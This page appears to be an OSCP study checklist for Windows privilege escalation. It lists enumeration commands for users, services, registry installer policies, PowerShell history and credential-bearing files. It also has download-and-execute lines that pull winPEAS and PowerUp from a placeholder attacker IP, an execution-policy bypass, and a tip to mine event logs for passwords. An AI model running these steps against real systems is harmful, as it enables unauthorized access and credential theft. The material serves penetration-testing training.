> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/windows-privilege-escalation/checklist.md).

# Checklist

{% hint style="info" %}
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
{% endhint %}

#### Basic enum / quick wins

```
whoami /all
```

```
cmdkey /list
```

```
systeminfo
```

```
net user
net user <current user>
```

```
net group
```

```
Get-History
```

<pre><code><strong>(Get-PSReadlineOption).HistorySavePath
</strong>type &#x3C;previous command output>
</code></pre>

```
ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
```

{% hint style="info" %}
Do this for all available users; Post exploitation as well
{% endhint %}

#### Network and port enum

```
ipconfig /all
```

```
netstat -ano
route print
```

#### Installed software and service enum

```
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
```

```
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

```
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```

```
services
```

```
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
```

```
icacls <service binary path>
```

#### Sensitive file enum

```
$env:AppKey
```

```
gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue
```

```
gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
```

```
gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
```

```
gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
```

```
gci C:\Users\Public
```

```
where.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exe
```

#### Process snooping

```
Import-Module .\Watch-Command.ps1
Get-Process | watch-command -diff -cont -verbose -property "Image Name"
```

1. Winpeas

```
curl 192.168.45.x/winPEAS.exe -o winpeas.exe
.\winpeas.exe
```

2. PowerUp

```
IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks
```

3. PrivescCheck

```
powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'
```

{% hint style="info" %}
Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol.
{% endhint %}

1. eventvwr
2. Applicatioins and Services
3. Microsoft
4. Windows
5. Powershell
6. Operational
7. Filter current log&#x20;
8. Event 4104
